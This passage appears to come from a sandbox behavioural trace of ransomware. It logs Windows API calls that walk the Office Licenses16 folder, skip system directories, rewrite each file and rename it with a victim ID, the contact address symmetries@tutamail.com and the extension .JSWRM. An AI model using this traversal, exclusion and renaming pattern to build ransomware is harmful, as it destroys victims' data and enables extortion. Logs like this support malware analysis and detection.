Size=0x20) returned 0x2412e0 [0103.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0103.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.514] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10659) returned 1 [0103.514] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0103.514] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0103.517] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.517] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0103.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.517] CloseHandle (hObject=0x45c) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0103.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0103.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.518] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0103.519] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe42d7c8c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe42d7c8c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe43967f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail3-ppd.xrm-ms", cAlternateFileName="HO3209~1.XRM")) returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2=".") returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="..") returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="...") returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="windows") returned -1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.519] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0103.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.520] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22092) returned 1 [0103.520] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0103.520] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0103.611] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.611] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0103.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.611] CloseHandle (hObject=0x45c) returned 1 [0103.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0103.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0103.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0103.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0103.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0103.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0103.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0103.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0103.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.613] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe42d7c8c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe42d7c8c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4408fb4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail3-ul-oob.xrm-ms", cAlternateFileName="HOFBD8~1.XRM")) returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.614] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d298, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.615] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11613) returned 1 [0103.615] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0103.615] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0103.618] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.618] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0103.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.618] CloseHandle (hObject=0x45c) returned 1 [0103.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0103.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0103.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0103.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0103.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0103.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0103.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.620] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe426559f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe426559f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe43241ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail3-ul-phn.xrm-ms", cAlternateFileName="HO113C~1.XRM")) returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.620] lstrcmpiW (lpString1="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0103.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 